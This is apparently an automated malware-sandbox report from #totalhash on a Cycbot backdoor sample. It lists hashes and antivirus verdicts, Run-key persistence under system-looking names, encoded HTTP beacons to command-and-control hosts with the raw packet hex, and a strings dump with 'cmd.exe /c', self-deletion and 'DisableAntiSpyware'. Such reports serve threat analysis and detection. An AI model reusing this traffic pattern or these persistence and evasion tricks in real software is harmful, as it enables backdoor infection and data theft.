Analysis | #totalhash

Analysis Date	2015-01-14 10:37:50
MD5	2502cb43dad8a5b5c68ea77dde4a94b2
SHA1	09e322ae487f2c52806ee445f8391fadd230db5e

Static Details:

File type	PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section	.text md5: d81a4fda2de17463282ff02fae0e166d sha1: c604dd646fbbc862be8e35a60e89cc2d9774a2ac size: 190464
Section	.rdata md5: 19d3f1566018ecd91426b748915a33bc sha1: 986b352c813030842142e20f7e96e7a0eb1523d4 size: 50176
Section	.data md5: bdd691a050d08bd374bad830fadcbbef sha1: 0ae87bcb6dde2c9ef854228c820fb03bc94247c3 size: 5120
Section	.rsrc md5: af1f3614fbdf332641d41a60d8868f6a sha1: 843ccafbc15dd01f30e02cc0fdbe10184967d1a6 size: 1536
Timestamp	2011-02-28 14:45:25
Version	PrivateBuild: 1065
Packer	Microsoft Visual C++ ?.?
PEhash	fc426b2549d2044ef23aa94fa923a4eedd831e2f
IMPhash	419430452cde85f54e7d37d9e39cedff
AV	360 Safe	no_virus
AV	Ad-Aware	Gen:Trojan.Heur.KS.1
AV	Alwil (avast)	Malware-gen:Win32:Malware-gen
AV	Arcabit (arcavir)	Gen:Trojan.Heur.KS.1
AV	Authentium	W32/FraudLoad.C.gen!Eldorado
AV	Avira (antivir)	BDS/Cycbot.B.1226
AV	BullGuard	Gen:Trojan.Heur.KS.1
AV	CA (E-Trust Ino)	no_virus
AV	CAT (quickheal)	Backdoor.Cycbot
AV	ClamAV	Win.Trojan.Cycbot-5273
AV	Dr. Web	BackDoor.Gbot.25
AV	Emsisoft	Gen:Trojan.Heur.KS.1
AV	Eset (nod32)	Win32/Cycbot.AK
AV	Fortinet	W32/Cycbot.AF!tr
AV	Frisk (f-prot)	W32/FraudLoad.C.gen!Eldorado
AV	F-Secure	Gen:Trojan.Heur.KS.1
AV	Grisoft (avg)	BackDoor.Generic13.AOQC
AV	Ikarus	Backdoor.Win32.Cycbot
AV	K7	no_virus
AV	Kaspersky	Trojan.Win32.Generic
AV	MalwareBytes	no_virus
AV	Mcafee	BackDoor-EXI
AV	Microsoft Security Essentials	Backdoor:Win32/Cycbot.B
AV	MicroWorld (escan)	Gen:Trojan.Heur.KS.1
AV	Rising	no_virus
AV	Sophos	no_virus
AV	Symantec	Backdoor.Trojan
AV	Trend Micro	no_virus
AV	VirusBlokAda (vba32)	no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry	HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File	C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File	PIPE\lsarpc
Creates File	C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File	\Device\Afd\Endpoint
Creates File	C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File	C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process	C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex	{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex	WininetConnectionMutex
Creates Mutex	c:!documents and settings!administrator!cookies!
Creates Mutex	{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex	{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex	c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex	{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex	c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS	pdasoftstorage.com
Winsock DNS	ordersmallcd.com
Winsock DNS	127.0.0.1
Winsock DNS	japanesegreenteaonline.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process	C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process	C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS	japanesegreenteaonline.com Type: A 66.117.0.221
DNS	zonetf.com Type: A 141.8.225.80
DNS	zonetf.com Type: A 141.8.225.80
DNS	ordersmallcd.com Type: A
DNS	pdasoftstorage.com Type: A
HTTP GET	http://japanesegreenteaonline.com/assets/images/greentea-cha-2.gif?v44=5&tq=gKZEtzyNv5%2FwCG7JJ89dGh9OdXplL73OUM5k9Qyw8zosty6MG30%2FNGhyIXgV2E6j8mzci7fV%2FM3zyMs0TC7vqrCceZSWwhFgo0SmQMeGhKVP7d6JZl71DYJWFlmvhYAPB%2B9LvJXLI2qIusLT%2BocaCXdnnDFpxyS3tLdSn7xqeXdk1DIbrSFlNvoXr7XLI3kgVlaDhqVtK3Xt3oZoJsfeOnPu4UDdOvdTiSbmDerbzcAqcklC%2B%2BRNsI814YynsimX6bIE2ea9DP%2FkL%2FUy0QE7PaX0SNLyIXm0HIKkj0KahY8iuBQ%2FRqgvflHxu83FLXGzwgJOwmk61%2Fgssy%2Bx%2FUMyEw120sdoequbctsLH9QmnMTKtZJRlVwLmFJKMnmknYF011ciOA1kfG8FZ%2FXmq21Ctqq2ez6AQpzHiBBbv User-Agent: mozilla/2.0
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST	http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP	192.168.1.1:1031 ➝ 66.117.0.221:80
Flows TCP	192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP	192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap

0x00000000 (00000)   47455420 2f617373 6574732f 696d6167   GET /assets/imag
0x00000010 (00016)   65732f67 7265656e 7465612d 6368612d   es/greentea-cha-
0x00000020 (00032)   322e6769 663f7634 343d3526 74713d67   2.gif?v44=5&tq=g
0x00000030 (00048)   4b5a4574 7a794e76 35253246 77434737   KZEtzyNv5%2FwCG7
0x00000040 (00064)   4a4a3839 64476839 4f645870 6c4c3733   JJ89dGh9OdXplL73
0x00000050 (00080)   4f554d35 6b395179 77387a6f 73747936   OUM5k9Qyw8zosty6
0x00000060 (00096)   4d473330 2532464e 47687949 58675632   MG30%2FNGhyIXgV2
0x00000070 (00112)   45366a38 6d7a6369 37665625 32464d33   E6j8mzci7fV%2FM3
0x00000080 (00128)   7a794d73 30544337 76717243 63655a53   zyMs0TC7vqrCceZS
0x00000090 (00144)   57776846 676f3053 6d514d65 47684b56   WwhFgo0SmQMeGhKV
0x000000a0 (00160)   50376436 4a5a6c37 3144594a 57466c6d   P7d6JZl71DYJWFlm
0x000000b0 (00176)   76685941 50422532 42394c76 4a584c49   vhYAPB%2B9LvJXLI
0x000000c0 (00192)   32714975 734c5425 32426f63 61435864   2qIusLT%2BocaCXd
0x000000d0 (00208)   6e6e4446 70787953 33744c64 536e3778   nnDFpxyS3tLdSn7x
0x000000e0 (00224)   71655864 6b314449 62725346 6c4e766f   qeXdk1DIbrSFlNvo
0x000000f0 (00240)   58723758 4c49336b 67566c61 44687156   Xr7XLI3kgVlaDhqV
0x00000100 (00256)   744b3358 74336f5a 6f4a7366 654f6e50   tK3Xt3oZoJsfeOnP
0x00000110 (00272)   75345544 644f7664 54695362 6d446572   u4UDdOvdTiSbmDer
0x00000120 (00288)   627a6341 71636b6c 43253242 25324252   bzcAqcklC%2B%2BR
0x00000130 (00304)   4e734938 31345979 6e73696d 58366249   NsI814YynsimX6bI
0x00000140 (00320)   45326561 39445025 32466b4c 25324655   E2ea9DP%2FkL%2FU
0x00000150 (00336)   79305145 37506158 30534e4c 7949586d   y0QE7PaX0SNLyIXm
0x00000160 (00352)   3048494b 6b6a304b 61685938 69754251   0HIKkj0KahY8iuBQ
0x00000170 (00368)   25324652 71677666 6c487875 3833464c   %2FRqgvflHxu83FL
0x00000180 (00384)   58477a77 674a4f77 6d6b3631 25324667   XGzwgJOwmk61%2Fg
0x00000190 (00400)   73737925 32427825 3246554d 79457731   ssy%2Bx%2FUMyEw1
0x000001a0 (00416)   32307364 6f657175 62637473 4c483951   20sdoequbctsLH9Q
0x000001b0 (00432)   6d6e4d54 4b745a4a 526c5677 4c6d464a   mnMTKtZJRlVwLmFJ
0x000001c0 (00448)   4b4d6e6d 6b6e5946 30313163 694f4131   KMnmknYF011ciOA1
0x000001d0 (00464)   6b664738 465a2532 46586d71 32314374   kfG8FZ%2FXmq21Ct
0x000001e0 (00480)   71713265 7a364151 707a4869 42426276   qq2ez6AQpzHiBBbv
0x000001f0 (00496)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000200 (00512)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000210 (00528)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000220 (00544)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000230 (00560)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000240 (00576)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000250 (00592)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a58 30534e4c 7949586d   ose....X0SNLyIXm
0x00000160 (00352)   3048494b 6b6a304b 61685938 69754251   0HIKkj0KahY8iuBQ
0x00000170 (00368)   25324652 71677666 6c487875 3833464c   %2FRqgvflHxu83FL
0x00000180 (00384)   58477a77 674a4f77 6d6b3631 25324667   XGzwgJOwmk61%2Fg
0x00000190 (00400)   73737925 32427825 3246554d 79457731   ssy%2Bx%2FUMyEw1
0x000001a0 (00416)   32307364 6f657175 62637473 4c483951   20sdoequbctsLH9Q
0x000001b0 (00432)   6d6e4d54 4b745a4a 526c5677 4c6d464a   mnMTKtZJRlVwLmFJ
0x000001c0 (00448)   4b4d6e6d 6b6e5946 30313163 694f4131   KMnmknYF011ciOA1
0x000001d0 (00464)   6b664738 465a2532 46586d71 32314374   kfG8FZ%2FXmq21Ct
0x000001e0 (00480)   71713265 7a364151 707a4869 42426276   qq2ez6AQpzHiBBbv
0x000001f0 (00496)   20485454 502f312e 300d0a43 6f6e6e65    HTTP/1.0..Conne
0x00000200 (00512)   6374696f 6e3a2063 6c6f7365 0d0a486f   ction: close..Ho
0x00000210 (00528)   73743a20 6a617061 6e657365 67726565   st: japanesegree
0x00000220 (00544)   6e746561 6f6e6c69 6e652e63 6f6d0d0a   nteaonline.com..
0x00000230 (00560)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x00000240 (00576)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x00000250 (00592)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

Strings

U
\
U
/
%
..
 
0
%
-
-
 
CC
.
00-+ 
\
.
-e-
. 
00-+ 
0
`@
-E-
-0
-0010+-0
-0
0
0- 
0
0
.
u
040904b0
1065
!1Aa
1Name
#+3;CScs
7root\CIMV2
9Select * from Win32_Product
- abort() has been called
April
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
Avast
Avira
BitDefender
CCONOUT$
CHH:mm:ss
(Cjj
class
CMicrosoft Visual C++ Runtime Library
- CRT not initialized
dddd, MMMM dd, yyyy
December
deflate
descr
domain
DOMAIN error
Dr.Web
ESET NOD32
etext
February
- floating point support not loaded
Friday
gzip
                                 H
         (((((                  H
         h((((                  H
http://
http=127.0.0.1:%d
http://www.google.com
http://www.yahoo.com
January
jjjjj
July
June
Kaspersky
March
McAfee
MM/dd/yy
Monday
mscoree.dll
nKERNEL32.DLL
Norton
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
(null)
October
ppchits
ppcid
ppctimeout
PrivateBuild
Program: 
<program name unknown>
- pure virtual function call
R6002
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
refmethod
runtime error 
Runtime Error!
Saturday
September
SING error
stitle
StringFileInfo
Sunday
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
Thursday
TLOSS error
Translation
Tuesday
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
VarFileInfo
VS_VERSION_INFO
Wednesday
WUSER32.DLL
                          
0123456789ABCDEF
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
%02X%02X%02X%02X%02X%02X%02X%02X%02X%02X
\$09\$Lt
"127.0.0.1"
127.0.0.1
127.0.0.1:%s
1#QNAN
1#SNAN
.2mdn.
{35BCA615-C82A-4152-8857-BCC626AE4C8D}
<3%u1f
{43B671F0-5D50-4dbe-AD9C-64A6167C57AD}
{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
{61B98B86-5F44-42b3-BCA1-33904B067B81}
{6B985724-623F-492e-B0D6-C9715ADE853B}
{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
;7|G;p
\$89\$
\$89\$ u
8Sh8_C
|$,9|$
\$<9\$
9|$0t:
{95F6585C-CC1E-4b52-A63B-9FBC6A94F371}
|$ 9|$8t
9\$Dulh
9p,u	9p4
|$$9|$ t
\$$9\$<t
^9|$(t6
^(9^$u
9}$uG9}@tB;
{A5B35993-9674-43cd-8AC7-5BC5013E617B}
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/71
.abmr.
Accept: */*
Accept-Language
.adtechus.
AdTitle txt
Advapi32.dll
ADVAPI32.dll
Alwil Software*
amazon.
</answer>
aolcdn.
aol/search
aolsvc.
            app=application used to check images,
APPDATA
<applet
</applet
application
application/java
            -arg0..-argn=application options
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><ms_windowsSettings:dpiAware xmlns:ms_windowsSettings="http://schemas.microsoft.com/SMI/2005/WindowsSettings" xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</ms_windowsSettings:dpiAware></windowsSettings></application></assembly>P
.atdmt.
attachment
.atwola.
August
.autodatadirect.
AUTO_UP
Avast*
AvastUI.exe
.?AVbad_alloc@std@@
.?AVbad_exception@std@@
.?AVexception@std@@
avgnt.exe
Avira*
.?AVlength_error@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
__based(
bing.com
bing.com/search
.bing.net
BINPLACE : error BNP0000: Invalid switch - /%c
BINPLACE looks for the following environment variable names:
BINPLACE_OVERRIDE_FLAGS
   BINPLACE_OVERRIDE_FLAGS - may contain additional switches
 BINPLACE_PLACEFILE
   BINPLACE_PLACEFILE - default value for -p flag
BINPLACE : warning BNP0000: ignoring directory %s
bitdef
blogger
blog/images/3521.jpg
blog/images/3522.jpg
blog/images/3523.jpg
</BODY>
<BODY style="overflow: hidden;margin:0 0 0 0; padding:0 0 0 0;">
brightcove.com
       [-b subdir] put file in subdirectory of normal place
buffer error
{C0429A47-0CF0-4d1b-9616-C588FA0A3DDB}
c1.exe
c2.exe
c3.exe
{C66E79CE-8935-4ed9-A6B1-4983619CB925}
C8;C0vE
Cache-Control
Cache-Control: no-cache,  must-revalidate
ccsvchst.exe
__cdecl
ChangeAsmsToRetailForSymbols
 check
CHECK_CONTEINER
chunked
       [-ci <rc,app,-arg0,-argv1,-argn>]
.class
 Class Hierarchy Descriptor'
CloseHandle
__clrcall
cmd.exe /c "%s"
CoCreateInstance
CoInitialize
CoInitializeSecurity
CompareStringW
 Complete Object Locator'
/complete/search
conhost
conhost.exe
Connection
Connection: close
Content-Disposition
Content-Encoding
Content-length: 
Content-Length
Content-Length: 0
Content-Length: %u
Content-Type
`copy constructor closure'
CopyFileA
CorExitProcess
CoSetProxyBlanket
CoUninitialize
CreateDirectoryA
CreateEventA
CreateFileA
CreateFileMappingA
CreateFileW
CreateMutexA
CreateProcessA
CreateThread
CreateTimerQueue
CreateTimerQueueTimer
CreateToolhelp32Snapshot
csrss.exe
D$$_^[3
D$4j P
D$8PWWWWWWWWWW
D$$9|$
D$$9D$
.dartsearch.
@.data
data error
%d.%d.%d
dddd, MMMM dd, yyyy
       [-d dump-override]
December
DecodePointer
`default constructor closure'
DefineDosDeviceA
deflate
del %%0
 delete
 delete[]
DeleteCriticalSection
DeleteFileA
DeleteTimerQueueEx
del "%s"
Description
\Device\
DeviceIoControl
D$HVWP
DisableAntiSpyware
D$L9|$
DMNAVL
DNTCHECK
.doubleclick.
doubleclick.
.doubleclick.net
doubleclick.net
D$|Ph~f
D$pPWWWWWWW
D$pSVW
D$PSVW
[%d] %s
D$T;D$\
dwm.exe
DWN_CON_STRP_%d_%s
`dynamic atexit destructor for '
`dynamic initializer for '
d|YXkf://6KYOQXQAQjTcQh.ReOfhRTL2QIJGJfYDWV.Gfc/6a.HYct?y=Xsrdyt|QWiWQPd EDLGVK|BGlYFDd Vfc6SJK|ObfESQN q_b|RXeWRRO JAPT|EGScSDQ bEVo|6KYOQXb HQTIZd|QWiWQPd CUABM|EGScSDQ mMXV|IJLZ ObfESQNm|PQjW OTfZDDFQ|NMOE VVULTEei|
d|YXkf://6RVROpXJQ.QNVdiRjWOgRGIAJQEUF.XdP/Dm.EjfT?o=hip0sd|aQTcZQ USgWbX|MDLGVE SPgQQFV|PSjESH bbi|_6iYNV SYhc|ZOhZOD D8Lb|MBnYQD bEVZAX|SGgeb6 RgIYQ|aRkWaP mJI6|KMIU MViLQR|HSjA QHZWjP|BYcD fMiZeO|
d|YXkf://6XPGaYT6jiIZd.QdSfgPiJDK8NJJMcQWH.TSd/RS.FZVk?6=pZrtd2|MhZSa RPjJQ8|8_MBO ldPDdGW|RONHT jka|6hYAh SYhc|OfXRO O2Bf|ETJVc ODUMWi|6XPGa YfETU|AmUQd nWTT|cFHL 8_MBOm|TDWV EjZ6SZ|LWjS 6hYAhd|ZRgOa SRULFE|REQBh gRPRRUV|FFWGa scI|ZQPVZ WZiZ|XPfBQ D8Lb|KBjQQ ORH_VO|OHVOj QNYTE|dMeRe jWUV|EDLC REQBh|SKLdIjV 9F_Oac|RDYcEmQ gedOaRV|DKALMWF Xib|FKZRWiA LPXZ|ZWEcUSZ XQUp|QVXdFV6 JIHJFm|SKLdIjV 7WPJS|ZWEcUSZ hYWW|ROhV DKALMWF|
d|YXkf://7JZZ-QePHYh-Sn_gV.Ub_/?kc=biZYq&XS=iusc|FZEcZO|HPGZe|
d|YXkf://7JZZ-ZajEigA-medhW.Qba/?mN=dYehm&US=2pfc|bImZPWH|RSrXPg|
d|YXkf://JF__eX_LUcIm_aV.Ub_/?kc=biZYq&XS=iush|HdPShCJ WKaeg|LUcIm QcbSeUT|fFQAQ _M_F ZcODhKW|fASPYbhT|AgUCnUaV gWZ_|VSH4RQPF EljJ|
d|YXkf://ORVQ-bt.RKb/?lM=vrwq0&ge=wqdh|6JMGUSicLF TMYRNJ_ZS|a REWQRZeiV|hhWh iNRCC|YYJU mbRNZRY|gQN_ IWcPNUiTZ|Mcj_ f_caJQ8|8VXJ TgdNH|
d|YXkf://PTW-aWXVNQ-hTicU.Tf_/?ja=rgjSg&aV=iaxp|YLRKiR|RNHMe|
d|YXkf://Sac.GaXgPQhIVdQWXWZXRUH.4MU/EX.Bme_?m=rgtu_m|KGgebC|bUEn hdc|dSSh R XRE|KMIU HcgO|PVIk R CNYR|_aTP aQDs|YUVk O ZPUZ|G2RM _PN|YQWH R _fc|9F_K UefH|TQTZ M WZiZ|RPjF O2Bf|HBUZ Q ODUb|XZJI cOTa|UEcT BlUTV|YWe_i PQDGVI|HJla RQbMeV|BNUJ febCaUS|gQUj jWaVbF|G2RM WJOaaH|VZRYbAX VTZebA|gjSmUQd nb_|fkTVA8V KJSf|gXViMSd HFKd|eqgOYQN fMTZWf|eiiTL2L JVJEZ|gXViMSd SNMK|hgf6YcIVZ led|hYfRJQA8V KJSf|jNURMeZ6S SGRu|iGgQIhUQd cORXVT|XCPIMOJVc EUZHW|kGWHOaePJ lYFZ|
d|YXkf://Sac.LWjT6cTCbUS.Tf_/?ja=rgjSg&aV=iaxx|DFeVe|R9NKGf|XgESh|AlYQd_|P-eXTI|EJGWRJ|DVaYLd OcVES|JG_a_ 6SiIpQ|T&X|V & U|RcbDH & 88JEOOV|TROTI Sd9 LHHOjb6|TYEmQa _WOag|UJHKCT _FBl|UQHhK_V SJHX|SjTNWYE dQQdj|RfekBU6B|O WUBl gDZ|X-WkRN|LHRZePJd|WUXOY|XlSfg mFDJ|FbKP CihV|NVRqe|INZY felPn|bOmOXZeb|cfRED|JGcIS JmaDQU|VfSAW_U QXj6aaI|l_STfPOfeDFG|PWGDP WQURTGf|jKRTd Ve_BYWEl|egkjfOfUJ|Y6P_EDF|Wja MVEei|7Ze YVkTO|RjY XXdjZSf|QkZ E2E_|RFX XdOOVGkZKS|I_l oWEgi|Ci_a mWOe|QkZ M2ASIU|NZc ZHRV|neIJU bSXf|GYTS qQQh|Thl PTDHKQWVJFm|
d|YXkf://SJSR-fhTAe.SOg/?hb=rxunx&jS=kSam|WMFZe ZHbP|jbAJWOac dEaa|SfQUf VWfchEHJ|QTIFQ jgREbId|ZJXVSaeP|PgQNkfYb_mSf|
__eabi
@echo off
       [-e] don't exit if a file in list could not be binplaced
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
encheck
EncodePointer
EnterCriticalSection
err049
err050
err051
err053
err055
err060
err061
err062
err063
err064
err065
err067
err069
err072
err073
err077
err079
err080
err081
err082
err084
err085
err086
err087
err088
err093
err094
err095
err096
err097
err098
err099
err0%s_%d_%d
err1001
err1002
err1003
err1005
err1006
err1007
err1008
err1009
err1010
err1011
err1012
err1013
err1014
err1015
err1016
err1017
err1018
err1019
err1020
err1021
err1022
err1023
err1024
err1025
err1026
err1027
err1028
err1029
err1030
err1031
err1032
err1033
err%d%s_%d_%d
ewh/?y
exec|%s
ExitProcess
ExpandEnvironmentStringsA
Expires: -1
